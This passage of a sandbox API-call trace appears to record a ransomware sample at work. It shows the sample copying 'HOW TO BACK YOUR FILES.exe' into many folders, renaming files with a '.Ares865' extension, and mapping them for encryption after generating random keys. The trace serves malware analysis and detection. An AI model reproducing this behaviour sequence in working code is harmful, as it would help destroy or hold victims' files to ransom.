Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.712] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.712] GetLastError () returned 0x0 [0042.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.712] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.712] CloseHandle (hObject=0x118) returned 1 [0042.712] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.712] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.712] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.712] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.712] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.713] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.713] GetLastError () returned 0x0 [0042.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.713] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.713] CloseHandle (hObject=0x118) returned 1 [0042.713] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.713] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.714] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.714] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.714] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.714] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.714] GetLastError () returned 0x0 [0042.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.714] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.715] CloseHandle (hObject=0x118) returned 1 [0042.715] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.715] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.715] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.715] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.717] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.717] GetLastError () returned 0x0 [0042.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.717] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.717] CloseHandle (hObject=0x118) returned 1 [0042.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.718] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.722] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.723] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.723] GetLastError () returned 0x0 [0042.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.725] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.725] CloseHandle (hObject=0x118) returned 1 [0042.725] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.725] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0043.850] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.Ares865") returned 62 [0043.850] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.Ares865" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.ares865"), dwFlags=0x1) returned 1 [0043.850] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml.Ares865" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0043.851] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=119) returned 1 [0043.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0043.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0043.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0043.851] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0043.852] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0043.852] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0043.852] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x168 [0043.860] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0x190000 [0043.862] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0043.862] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0043.863] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0043.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0044.937] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 66 [0044.938] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0044.938] GetLastError () returned 0x20 [0044.938] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 88 [0044.938] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 88 [0044.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0044.938] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x448 [0044.938] WriteFile (in: hFile=0x118, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x58, lpOverlapped=0x0) returned 1 [0044.939] CloseHandle (hObject=0x118) returned 1 [0044.940] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0044.940] CloseHandle (hObject=0x0) returned 0 [0044.940] CloseHandle (hObject=0x0) returned 0 [0044.940] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0044.944] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 73 [0044.944] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0044.944] GetLastError () returned 0x20 [0044.944] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 95 [0044.944] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 95 [0044.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0044.944] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4a0 [0044.944] WriteFile (in: hFile=0x120, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x5f, lpOverlapped=0x0) returned 1 [0044.944] CloseHandle (hObject=0x120) returned 1 [0044.946] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0044.946] CloseHandle (hObject=0x0) returned 0 [0044.946] CloseHandle (hObject=0x0) returned 0 [0044.946] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0044.946] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0044.946] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0045.132] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.Ares865") returned 103 [0045.132] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.ares865"), dwFlags=0x1) returned 1 [0045.147] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0045.151] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11364) returned 1 [0045.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb50 [0045.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.151] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.152] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.152] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.152] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2f70, lpName=0x0) returned 0x12c [0045.156] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f70) returned 0x190000 [0045.158] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.158] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.158] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbc8 [0045.164] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.Ares865") returned 112 [0045.164] MoveFileExW 